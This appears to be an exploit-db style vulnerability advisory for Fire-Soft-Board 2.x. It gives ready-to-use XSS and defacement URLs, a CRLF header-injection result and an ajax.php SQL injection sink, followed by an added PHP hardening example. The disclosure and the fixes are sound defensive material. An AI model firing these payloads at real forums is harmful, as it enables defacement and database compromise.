| # Title : Forum Fire Soft Board 2.* Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Forum Fire-Soft-Board © 2004 - 2014
| # Tested on: windows 8.1 Français V.(Pro)
| # Bug : Multi
| # Download : http://www.fire-soft-board.com
=======================================
( XSS / HTML Inject ) :
http://localhost//fsb/index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=
CRLF injection/HTTP response splitting :
This vulnerability affects /fsb/index.php.
Attack details :
URL encoded POST input jumpbox was set to SomeCustomInjectedHeader:pentst_test
Injected header found: SomeCustomInjectedHeader: pentst_test
Cross site scripting (verified) :
This vulnerability affects /fsb/index.php.
Attack details :
URL encoded GET input like was set to begin" onmouseover=prompt(928030) bad="
The input is reflected inside a tag parameter between double quotes.
SQL injection :
C:\AppServ\www\fsb\ajax.php
Line : 438
mysqli::query
$sql
C:\AppServ\www\fsb\sdk.php
Line : 317
mysqli::query
$sql
http://localhost//fsb/ajax.php?sql= <=== inject here
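The three sinks above (a reflected value inside a double-quoted attribute, a request value copied into a response header, and a request value executed as the SQL statement itself) each have a standard fix. The block below is an added example written for this advisory, not Fire-Soft-Board's own code: the parameter names `like`, `jumpbox` and `sql` come from the advisory, while the function names, the assumption that `jumpbox` feeds a `Location` header, and the table and column names are assumptions for illustration.

```php
<?php
// Added hardening example, not Fire-Soft-Board code. Parameter names come
// from the advisory; function, table and column names are assumed.

// 1. Reflected XSS: the "like" value is echoed inside a double-quoted
//    attribute, so a value containing a double quote closes the attribute.
//    Vulnerable shape:  <input value="<?= $_GET['like'] ?>">
//    Fix: escape on output; ENT_QUOTES covers both quote styles.
function render_search_box(string $like): string
{
    $safe = htmlspecialchars($like, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="like" value="' . $safe . '">';
}

// 2. CRLF / header injection: "jumpbox" reaches a response header (assumed
//    here to be a redirect). A CR or LF in the value would start a new
//    header line, so reject those bytes and allow only known destinations.
function safe_jump_header(string $jumpbox, array $allowed): ?string
{
    if (preg_match('/[\r\n]/', $jumpbox)) {
        return null;                     // would split the response
    }
    if (!in_array($jumpbox, $allowed, true)) {
        return null;                     // not a page we redirect to
    }
    return 'Location: ' . $jumpbox;
}

// 3. ajax.php?sql=: the client supplies the whole statement, so quoting or
//    escaping cannot help. The fix is to never accept SQL from the request:
//    accept an action name, map it to a fixed statement, and bind the values.
function run_ajax_action(mysqli $db, string $action, int $id): ?mysqli_result
{
    $statements = [                      // assumed table and column names
        'user'  => 'SELECT u_id, u_nickname FROM fsb_users WHERE u_id = ?',
        'topic' => 'SELECT t_id, t_title FROM fsb_topics WHERE t_id = ?',
    ];
    if (!isset($statements[$action])) {
        return null;                     // unknown action, nothing executed
    }
    $stmt = $db->prepare($statements[$action]);
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result();
}

// Usage sketch for a request handler:
//   echo render_search_box($_GET['like'] ?? '');
//   $h = safe_jump_header($_POST['jumpbox'] ?? '', ['index.php?p=userlist']);
//   if ($h !== null) { header($h); }
//   $res = run_ajax_action($db, $_GET['action'] ?? '', (int) ($_GET['id'] ?? 0));
```

The design point for the SQL case is that the advisory's sink is not a string-concatenation bug but an interface that takes a statement from the browser; the only repair is to remove that interface and replace it with a fixed set of server-side statements.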
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friends :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------